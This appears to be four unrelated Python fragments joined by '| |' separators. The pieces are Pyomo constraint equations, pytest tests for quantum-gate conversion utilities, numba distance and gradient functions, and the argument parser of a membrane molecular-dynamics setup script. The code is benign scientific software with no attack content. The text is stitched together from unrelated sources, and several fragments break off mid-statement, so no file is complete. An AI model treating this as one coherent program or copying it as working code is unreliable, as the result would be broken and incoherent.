+ m.x1672 == 0)
m.c673 = Constraint(expr= - m.x223 - 82.091893062253*m.x913 - 4.62594653112602*m.x918 - 0.173783959337771*m.x923
+ m.x1673 == 0)
m.c674 = Constraint(expr= - m.x224 - 82.091893062253*m.x914 - 4.62594653112602*m.x919 - 0.173783959337771*m.x924
+ m.x1674 == 0)
m.c675 = Constraint(expr= - m.x225 - 82.091893062253*m.x915 - 4.62594653112602*m.x920 - 0.173783959337771*m.x925
+ m.x1675 == 0)
m.c676 = Constraint(expr= - m.x226 - 364.2*m.x926 - 91.05*m.x931 - 15.175*m.x936 + m.x1676 == 0)
m.c677 = Constraint(expr= - m.x227 - 364.2*m.x927 - 91.05*m.x932 - 15.175*m.x937 + m.x1677 == 0)
m.c678 = Constraint(expr= - m.x228 - 364.2*m.x928 - 91.05*m.x933 - 15.175*m.x938 + m.x1678 == 0)
m.c679 = Constraint(expr= - m.x229 - 364.2*m.x929 - 91.05*m.x934 - 15.175*m.x939 + m.x1679 == 0)
m.c680 = Constraint(expr= - m.x230 - 364.2*m.x930 - 91.05*m.x935 - 15.175*m.x940 + m.x1680 == 0)
m.c681 = Constraint(expr= - m.x226 - 646.308106937747*m.x926 - 286.734053468873*m.x931 - 84.8062160406618*m.x936
+ m.x1681 == 0)
m.c682 = Constraint(expr= - m.x227 - 646.308106937747*m.x927 - 286.734053468873*m.x932 - 84.8062160406618*m.x937
+ m.x1682 == 0)
m.c683 = Constraint(expr= - m.x228 - 646.308106937747*m.x928 - 286.734053468873*m.x933 - 84.8062160406618*m.x938
+ m.x1683 == 0)
m.c684 = Constraint(expr= - m.x229 - 646.308106937747*m.x929 - 286.734053468873*m.x934 - 84.8062160406618*m.x939
+ m.x1684 == 0)
m.c685 = Constraint(expr= - m.x230 - 646.308106937747*m.x930 - 286.734053468873*m.x935 - 84.8062160406618*m.x940
+ m.x1685 == 0)
m.c686 = Constraint(expr= - m.x226 - 82.091893062253*m.x926 - 4.62594653112602*m.x931 - 0.173783959337771*m.x936
+ m.x1686 == 0)
m.c687 = Constraint(expr= - m.x227 - 82.091893062253*m.x927 - 4.62594653112602*m.x932 - 0.173783959337771*m.x937
+ m.x1687 == 0)
m.c688 = Constraint(expr= - m.x228 - 82.091893062253*m.x928 - 4.62594653112602*m.x933 - 0.173783959337771*m.x938
+ m.x1688 == 0)
m.c689 = Constraint(expr= - m.x229 - 82.091893062253*m.x929 - 4.62594653112602*m.x934 - 0.173783959337771*m.x939
+ m.x1689 == 0)
m.c690 = Constraint(expr= - m.x230 - 82.091893062253*m.x930 - 4.62594653112602*m.x935 - 0.173783959337771*m.x940
+ m.x1690 == 0)
m.c691 = Constraint(expr= - m.x231 - 364.2*m.x941 - 91.05*m.x946 - 15.175*m.x951 + m.x1691 == 0)
m.c692 = Constraint(expr= - m.x232 - 364.2*m.x942 - 91.05*m.x947 - 15.175*m.x952 + m.x1692 == 0)
m.c693 = Constraint(expr= - m.x233 - 364.2*m.x943 - 91.05*m.x948 - 15.175*m.x953 + m.x1693 == 0)
m.c694 = Constraint(expr= - m.x234 - 364.2*m.x944 - 91.05*m.x949 - 15.175*m.x954 + m.x1694 == 0)
m.c695 = Constraint(expr= - m.x235 - 364.2*m.x945 - 91.05*m.x950 - 15.175*m.x955 + m.x1695 == 0)
m.c696 = Constraint(expr= - m.x231 - 646.308106937747*m.x941 - 286.734053468873*m.x946 - 84.8062160406618*m.x951
+ m.x1696 == 0)
m.c697 = Constraint(expr= - m.x232 - 646.308106937747*m.x942 - 286.734053468873*m.x947 - 84.8062160406618*m.x952
+ m.x1697 == 0)
m.c698 = Constraint(expr= - m.x233 - 646.308106937747*m.x943 - 286.734053468873*m.x948 - 84.8062160406618*m.x953
+ m.x1698 == 0)
m.c699 = Constraint(expr= - m.x234 - 646.308106937747*m.x944 - 286.734053468873*m.x949 - 84.8062160406618*m.x954
+ m.x1699 == 0)
m.c700 = Constraint(expr= - m.x235 - 646.308106937747*m.x945 - 286.734053468873*m.x950 - 84.8062160406618*m.x955
+ m.x1700 == 0)
m.c701 = Constraint(expr= - m.x231 - 82.091893062253*m.x941 - 4.62594653112602*m.x946 - 0.173783959337771*m.x951
+ m.x1701 == 0)
m.c702 = Constraint(expr= - m.x232 - 82.091893062253*m.x942 - 4.62594653112602*m.x947 - | |
source = np.array(list(range(16, 16 * 16)), dtype=np.float64)
# Act
actual = convert_var_to_gate(
c_sys=c_sys_2q,
var=source,
on_para_eq_constraint=True,
is_physicality_required=False,
)
# Assert
expected = np.array(
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] + list(range(16, 16 * 16)),
dtype=np.float64,
)
expected = expected.reshape(16, 16)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
assert actual.composite_system is c_sys_2q
# Case 2:
# Arrange
source = np.array(list(range(16 * 16)), dtype=np.float64)
# Act
actual = convert_var_to_gate(
c_sys_2q,
source,
on_para_eq_constraint=False,
is_physicality_required=False,
)
# Assert
expected = np.array(range(16 * 16), dtype=np.float64)
expected = expected.reshape(16, 16)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
assert actual.composite_system is c_sys_2q
def test_convert_gate_to_var():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
# default
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = convert_hs_to_var(c_sys, hs)
expected = np.array([0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, -1], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# on_para_eq_constraint=True
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = convert_hs_to_var(c_sys, hs, on_para_eq_constraint=True)
expected = np.array([0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, -1], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# on_para_eq_constraint=False
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = convert_hs_to_var(c_sys, hs, on_para_eq_constraint=False)
expected = np.array(
[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, -1], dtype=np.float64
)
npt.assert_almost_equal(actual, hs.flatten(), decimal=15)
def test_convert_gate_to_var_2q():
# Arrange
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys_2q = CompositeSystem([e_sys0, e_sys1])
hs = np.array(range(16 * 16), dtype=np.float64)
hs = hs.reshape(16, 16)
gate = Gate(c_sys_2q, hs=hs, is_physicality_required=False)
hs = np.array(range(16 * 16), dtype=np.float64)
hs = hs.reshape(16, 16)
# Act
actual = convert_hs_to_var(c_sys_2q, hs, on_para_eq_constraint=True)
# Assert
expected = np.array(list(range(16, 16 * 16)), dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# Act
actual = convert_hs_to_var(c_sys_2q, hs, on_para_eq_constraint=False)
# Assert
expected = np.array(list(range(16 * 16)), dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
def test_calc_gradient_from_gate():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
# default
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = calc_gradient_from_gate(c_sys, hs, 1)
expected = np.array(
[[0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=np.float64
)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
# on_para_eq_constraint=True
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = calc_gradient_from_gate(c_sys, hs, 1, on_para_eq_constraint=True)
expected = np.array(
[[0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=np.float64
)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
# on_para_eq_constraint=False
hs = np.array(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
)
actual = calc_gradient_from_gate(c_sys, hs, 1, on_para_eq_constraint=False)
expected = np.array(
[[0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=np.float64
)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
def test_calc_agf():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
z = get_z(c_sys)
# case: g=u
actual = calc_agf(i, i)
expected = 1
assert np.isclose(actual, expected, atol=Settings.get_atol())
# case: g is not u
actual = calc_agf(z, x)
expected = 1.0 / 3.0
assert np.isclose(actual, expected, atol=Settings.get_atol())
# case: u is not unitary
hs = np.array(
[[1, 1, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float64
)
gate = Gate(c_sys, hs, is_physicality_required=False)
with pytest.raises(ValueError):
calc_agf(z.hs, gate)
# case: g is not Gate
hs = np.array(
[[1, 1, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float64
)
lind = EffectiveLindbladian(c_sys, hs, is_physicality_required=False)
with pytest.raises(ValueError):
calc_agf(lind, i)
# case: u is not Gate
hs = np.array(
[[1, 1, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float64
)
lind = EffectiveLindbladian(c_sys, hs, is_physicality_required=False)
with pytest.raises(ValueError):
calc_agf(i, lind)
def test_convert_hs():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
y = get_y(c_sys)
z = get_z(c_sys)
# for I
actual = convert_hs(i.hs, i.get_basis(), matrix_basis.get_comp_basis())
expected = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
npt.assert_almost_equal(actual, expected, decimal=15)
# for X
actual = convert_hs(x.hs, x.get_basis(), matrix_basis.get_comp_basis())
expected = np.array([[0, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]])
npt.assert_almost_equal(actual, expected, decimal=15)
# for Y
actual = convert_hs(y.hs, y.get_basis(), matrix_basis.get_comp_basis())
expected = np.array([[0, 0, 0, 1], [0, 0, -1, 0], [0, -1, 0, 0], [1, 0, 0, 0]])
npt.assert_almost_equal(actual, expected, decimal=15)
# for Z
actual = convert_hs(z.hs, z.get_basis(), matrix_basis.get_comp_basis())
expected = np.array([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])
npt.assert_almost_equal(actual, expected, decimal=15)
def test_get_i():
# case: dim = 2
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
y = get_y(c_sys)
z = get_z(c_sys)
npt.assert_almost_equal(x.hs @ i.hs, x.hs, decimal=15)
npt.assert_almost_equal(i.hs @ x.hs, x.hs, decimal=15)
npt.assert_almost_equal(y.hs @ i.hs, y.hs, decimal=15)
npt.assert_almost_equal(i.hs @ y.hs, y.hs, decimal=15)
npt.assert_almost_equal(z.hs @ i.hs, z.hs, decimal=15)
npt.assert_almost_equal(i.hs @ z.hs, z.hs, decimal=15)
# case: dim = 3
e_sys = ElementalSystem(1, matrix_basis.get_gell_mann_basis())
c_sys = CompositeSystem([e_sys])
actual = get_i(c_sys)
expected = np.eye(9, dtype=np.float64)
assert np.all(actual.hs == expected)
def test_get_x():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
y = get_y(c_sys)
z = get_z(c_sys)
npt.assert_almost_equal(x.hs @ x.hs, i.hs, decimal=15)
npt.assert_almost_equal(x.hs @ y.hs, z.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_x(c_sys)
def test_get_y():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
y = get_y(c_sys)
z = get_z(c_sys)
npt.assert_almost_equal(y.hs @ y.hs, i.hs, decimal=15)
npt.assert_almost_equal(y.hs @ z.hs, x.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_y(c_sys)
def test_get_z():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
i = get_i(c_sys)
x = get_x(c_sys)
y = get_y(c_sys)
z = get_z(c_sys)
npt.assert_almost_equal(z.hs @ z.hs, i.hs, decimal=15)
npt.assert_almost_equal(z.hs @ x.hs, y.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_z(c_sys)
def test_get_root_x():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
x = get_x(c_sys)
rootx = get_root_x(c_sys)
npt.assert_almost_equal(rootx.hs @ rootx.hs, x.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_root_x(c_sys)
def test_get_root_y():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
y = get_y(c_sys)
rooty = get_root_y(c_sys)
npt.assert_almost_equal(rooty.hs @ rooty.hs, y.hs, decimal=10)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_root_y(c_sys)
def test_get_s():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
z = get_z(c_sys)
s = get_s(c_sys)
npt.assert_almost_equal(s.hs @ s.hs, z.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_s(c_sys)
def test_get_sdg():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
s = get_s(c_sys)
sdg = get_sdg(c_sys)
i = get_i(c_sys)
npt.assert_almost_equal(s.hs @ sdg.hs, i.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_sdg(c_sys)
def test_get_t():
e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys])
s = get_s(c_sys)
t = get_t(c_sys)
npt.assert_almost_equal(t.hs @ t.hs, s.hs, decimal=15)
# Test that not 1qubit ElementalSystem
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys = CompositeSystem([e_sys0, e_sys1])
with pytest.raises(ValueError):
get_t(c_sys)
def test_get_cnot():
# prepare gate
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys0 = CompositeSystem([e_sys0])
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys1 = CompositeSystem([e_sys1])
c_sys01 = CompositeSystem([e_sys0, e_sys1])
# prepare states
z0_c_sys0 = get_z0_1q(c_sys0)
z1_c_sys0 = get_z1_1q(c_sys0)
z0_c_sys1 = get_z0_1q(c_sys1)
z1_c_sys1 = get_z1_1q(c_sys1)
z0_z0 = tensor_product(z0_c_sys0, z0_c_sys1)
z0_z1 = tensor_product(z0_c_sys0, z1_c_sys1)
z1_z0 = tensor_product(z1_c_sys0, z0_c_sys1)
z1_z1 = tensor_product(z1_c_sys0, z1_c_sys1)
### gete: control bit is 1st qubit
gate = | |
/= x_sum
y[i] /= y_sum
for i in range(n):
kl1 += x[i] * np.log(x[i] / y[i])
kl2 += y[i] * np.log(y[i] / x[i])
dist = (kl1 + kl2) / 2
grad = (np.log(y / x) - (x / y) + 1) / 2
return dist, grad
@numba.njit()
def correlation_grad(x, y):
mu_x = 0.0
mu_y = 0.0
norm_x = 0.0
norm_y = 0.0
dot_product = 0.0
for i in range(x.shape[0]):
mu_x += x[i]
mu_y += y[i]
mu_x /= x.shape[0]
mu_y /= x.shape[0]
for i in range(x.shape[0]):
shifted_x = x[i] - mu_x
shifted_y = y[i] - mu_y
norm_x += shifted_x ** 2
norm_y += shifted_y ** 2
dot_product += shifted_x * shifted_y
if norm_x == 0.0 and norm_y == 0.0:
dist = 0.0
grad = np.zeros(x.shape)
elif dot_product == 0.0:
dist = 1.0
grad = np.zeros(x.shape)
else:
dist = 1.0 - (dot_product / np.sqrt(norm_x * norm_y))
grad = ((x - mu_x) / norm_x - (y - mu_y) / dot_product) * dist
return dist, grad
@numba.njit(fastmath=True)
def sinkhorn_distance(
x, y, M=_mock_identity, cost=_mock_cost, maxiter=64
): # pragma: no cover
p = (x / x.sum()).astype(np.float32)
q = (y / y.sum()).astype(np.float32)
u = np.ones(p.shape, dtype=np.float32)
v = np.ones(q.shape, dtype=np.float32)
for n in range(maxiter):
t = M @ v
u[t > 0] = p[t > 0] / t[t > 0]
t = M.T @ u
v[t > 0] = q[t > 0] / t[t > 0]
pi = np.diag(v) @ M @ np.diag(u)
result = 0.0
for i in range(pi.shape[0]):
for j in range(pi.shape[1]):
if pi[i, j] > 0:
result += pi[i, j] * cost[i, j]
return result
@numba.njit(fastmath=True)
def spherical_gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma = np.abs(x[2]) + np.abs(y[2])
sign_sigma = np.sign(x[2])
dist = (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma) + np.log(sigma) + np.log(2 * np.pi)
grad = np.empty(3, np.float32)
grad[0] = mu_1 / sigma
grad[1] = mu_2 / sigma
grad[2] = sign_sigma * (1.0 / sigma - (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma ** 2))
return dist, grad
@numba.njit(fastmath=True)
def diagonal_gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma_11 = np.abs(x[2]) + np.abs(y[2])
sigma_12 = 0.0
sigma_22 = np.abs(x[3]) + np.abs(y[3])
det = sigma_11 * sigma_22
sign_s1 = np.sign(x[2])
sign_s2 = np.sign(x[3])
if det == 0.0:
# TODO: figure out the right thing to do here
return mu_1 ** 2 + mu_2 ** 2, np.array([0.0, 0.0, 1.0, 1.0], dtype=np.float32)
cross_term = 2 * sigma_12
m_dist = (
np.abs(sigma_22) * (mu_1 ** 2)
- cross_term * mu_1 * mu_2
+ np.abs(sigma_11) * (mu_2 ** 2)
)
dist = (m_dist / det + np.log(np.abs(det))) / 2.0 + np.log(2 * np.pi)
grad = np.empty(6, dtype=np.float32)
grad[0] = (2 * sigma_22 * mu_1 - cross_term * mu_2) / (2 * det)
grad[1] = (2 * sigma_11 * mu_2 - cross_term * mu_1) / (2 * det)
grad[2] = sign_s1 * (sigma_22 * (det - m_dist) + det * mu_2 ** 2) / (2 * det ** 2)
grad[3] = sign_s2 * (sigma_11 * (det - m_dist) + det * mu_1 ** 2) / (2 * det ** 2)
return dist, grad
@numba.njit(fastmath=True)
def gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
# Ensure width are positive
x[2] = np.abs(x[2])
y[2] = np.abs(y[2])
# Ensure heights are positive
x[3] = np.abs(x[3])
y[3] = np.abs(y[3])
# Ensure angle is in range -pi,pi
x[4] = np.arcsin(np.sin(x[4]))
y[4] = np.arcsin(np.sin(y[4]))
# Covariance entries for y
a = y[2] * np.cos(y[4]) ** 2 + y[3] * np.sin(y[4]) ** 2
b = (y[2] - y[3]) * np.sin(y[4]) * np.cos(y[4])
c = y[3] * np.cos(y[4]) ** 2 + y[2] * np.sin(y[4]) ** 2
# Sum of covariance matrices
sigma_11 = x[2] * np.cos(x[4]) ** 2 + x[3] * np.sin(x[4]) ** 2 + a
sigma_12 = (x[2] - x[3]) * np.sin(x[4]) * np.cos(x[4]) + b
sigma_22 = x[2] * np.sin(x[4]) ** 2 + x[3] * np.cos(x[4]) ** 2 + c
# Determinant of the sum of covariances
det_sigma = np.abs(sigma_11 * sigma_22 - sigma_12 ** 2)
x_inv_sigma_y_numerator = (
sigma_22 * mu_1 ** 2 - 2 * sigma_12 * mu_1 * mu_2 + sigma_11 * mu_2 ** 2
)
if det_sigma < 1e-32:
return (
mu_1 ** 2 + mu_2 ** 2,
np.array([0.0, 0.0, 1.0, 1.0, 0.0], dtype=np.float32),
)
dist = x_inv_sigma_y_numerator / det_sigma + np.log(det_sigma) + np.log(2 * np.pi)
grad = np.zeros(5, np.float32)
grad[0] = (2 * sigma_22 * mu_1 - 2 * sigma_12 * mu_2) / det_sigma
grad[1] = (2 * sigma_11 * mu_2 - 2 * sigma_12 * mu_1) / det_sigma
grad[2] = mu_2 * (mu_2 * np.cos(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
grad[2] += mu_1 * (mu_1 * np.sin(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
grad[2] *= det_sigma
grad[2] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_22
grad[2] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_11
grad[2] += x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
grad[2] /= det_sigma ** 2 + 1e-8
grad[3] = mu_1 * (mu_1 * np.cos(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
grad[3] += mu_2 * (mu_2 * np.sin(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
grad[3] *= det_sigma
grad[3] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_22
grad[3] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_11
grad[3] -= x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
grad[3] /= det_sigma ** 2 + 1e-8
grad[4] = (x[3] - x[2]) * (
2 * mu_1 * mu_2 * np.cos(2 * x[4]) - (mu_1 ** 2 - mu_2 ** 2) * np.sin(2 * x[4])
)
grad[4] *= det_sigma
grad[4] -= x_inv_sigma_y_numerator * (x[3] - x[2]) * np.sin(2 * x[4]) * sigma_22
grad[4] -= x_inv_sigma_y_numerator * (x[2] - x[3]) * np.sin(2 * x[4]) * sigma_11
grad[4] -= x_inv_sigma_y_numerator * 2 * sigma_12 * (x[2] - x[3]) * np.cos(2 * x[4])
grad[4] /= det_sigma ** 2 + 1e-8
return dist, grad
@numba.njit(fastmath=True)
def spherical_gaussian_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma = x[2] + y[2]
sigma_sign = np.sign(sigma)
if sigma == 0:
return 10.0, np.array([0.0, 0.0, -1.0], dtype=np.float32)
dist = (
(mu_1 ** 2 + mu_2 ** 2) / np.abs(sigma)
+ 2 * np.log(np.abs(sigma))
+ np.log(2 * np.pi)
)
grad = np.empty(3, dtype=np.float32)
grad[0] = (2 * mu_1) / np.abs(sigma)
grad[1] = (2 * mu_2) / np.abs(sigma)
grad[2] = sigma_sign * (
-(mu_1 ** 2 + mu_2 ** 2) / (sigma ** 2) + (2 / np.abs(sigma))
)
return dist, grad
# Special discrete distances -- where x and y are objects, not vectors
def get_discrete_params(data, metric):
if metric == "ordinal":
return {"support_size": float(data.max() - data.min()) / 2.0}
elif metric == "count":
min_count = scipy.stats.tmin(data)
max_count = scipy.stats.tmax(data)
lambda_ = scipy.stats.tmean(data)
normalisation = count_distance(min_count, max_count, poisson_lambda=lambda_)
return {
"poisson_lambda": lambda_,
"normalisation": normalisation / 2.0, # heuristic
}
elif metric == "string":
lengths = np.array([len(x) for x in data])
max_length = scipy.stats.tmax(lengths)
max_dist = max_length / 1.5 # heuristic
normalisation = max_dist / 2.0 # heuristic
return {"normalisation": normalisation, "max_dist": max_dist / 2.0} # heuristic
else:
return {}
@numba.jit()
def categorical_distance(x, y):
if x == y:
return 0.0
else:
return 1.0
@numba.jit()
def hierarchical_categorical_distance(x, y, cat_hierarchy=[{}]):
n_levels = float(len(cat_hierarchy))
for level, cats in enumerate(cat_hierarchy):
if cats[x] == cats[y]:
return float(level) / n_levels
else:
return 1.0
@numba.njit()
def ordinal_distance(x, y, support_size=1.0):
return abs(x - y) / support_size
@numba.jit()
def count_distance(x, y, poisson_lambda=1.0, normalisation=1.0):
lo = int(min(x, y))
hi = int(max(x, y))
log_lambda = np.log(poisson_lambda)
if lo < 2:
log_k_factorial = 0.0
elif lo < 10:
log_k_factorial = 0.0
for k in range(2, lo):
log_k_factorial += np.log(k)
else:
log_k_factorial = approx_log_Gamma(lo + 1)
result = 0.0
for k in range(lo, hi):
result += k * log_lambda - poisson_lambda - log_k_factorial
log_k_factorial += np.log(k)
| |
<reponame>shirtsgroup/LLC_Membranes<filename>LLC_Membranes/setup/equil.py
#!/usr/bin/env python
import argparse
import os
import subprocess
from LLC_Membranes.setup.gentop import SystemTopology
from LLC_Membranes.setup.genmdp import SimulationMdp
from LLC_Membranes.setup.restrain import RestrainedTopology
from LLC_Membranes.llclib import topology, physical, file_rw, gromacs
import mdtraj as md
import numpy as np
location = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) # Directory this script is in
def initialize():
parser = argparse.ArgumentParser(description='Solvate system and adjust so there is a certain wt % of water')
parser.add_argument('-i', '--initial', default='initial.gro', help='Coordinate file to add water to')
parser.add_argument('-ratio', '--ratio', default=1.5, type=float, help='Ratio of water in pores to water in tails')
parser.add_argument('-wt', '--weight_percent', default=10, type=float, help='Total weight percent of water')
parser.add_argument('-tol', '--tolerance', default=1, type=int, help='Number of water molecules')
parser.add_argument('-guess_range', default=[.4, 1], nargs='+', help='If water_content.db has no entries for the '
'build monomer, an initial radius will be randomly selected from this range')
parser.add_argument('-guess_stride', default=0.2, type=float, help='How far above/below the highest/lowest value to'
'make the next guess at pore radius if you need more/less water than the bounds of the water '
'content database (nm)')
parser.add_argument('-o', '--output', default='solvated_final.gro', help='Name of output file')
# parallelization
parser.add_argument('-mpi', '--mpi', action="store_true", help='Run MD simulations in parallel')
parser.add_argument('-np', '--nproc', default=4, type=int, help='Number of MPI processes')
# same flags as to build.py
parser.add_argument('-b', '--build_monomer', default='NAcarb11V.gro', nargs='+', type=str, help='Name of single '
'monomer structure file (.gro format) used to build full system')
parser.add_argument('-m', '--monomers_per_column', default=20, type=int, help='Number of monomers to stack in each'
'column')
parser.add_argument('-c', '--ncolumns', default=5, type=int, help='Number of columns used to build each pore')
parser.add_argument('-r', '--pore_radius', default=.6, type=float, help='Initial guess at pore radius (nm)')
parser.add_argument('-p', '--p2p', default=4.5, type=float, help='Initial pore-to-pore distance (nm)')
parser.add_argument('-n', '--nopores', default=4, type=int, help='Number of pores (only works with 4 currently)')
parser.add_argument('-d', '--dbwl', default=.37, type=float, help='Distance between vertically stacked monomers'
'(nm)')
parser.add_argument('-pd', '--parallel_displaced', default=0, type=float, help='Angle of wedge formed between line'
'extending from pore center to monomer and line from pore center to vertically adjacent monomer'
'head group.')
parser.add_argument('-angles', '--angles', nargs='+', default=[90, 90, 60], type=float, help='Angles between'
'box vectors')
parser.add_argument('-seed', '--random_seed', default=False, type=int, help='Pass an integer to give a seed for '
'random column displacement')
parser.add_argument('-mf', '--mol_frac', nargs='+', default=1., type=float, help='If using the -random flag, this gives'
'the relative amount of each monomer to add. List the fractions in the same order as'
'-build_monomer')
# flags unique to equil.sh
parser.add_argument('-ring_restraints', '--ring_restraints', default=["C", "C1", "C2", "C3", "C4", "C5"], nargs='+',
help='Name of atoms used to restrain head groups during initial equilibration.')
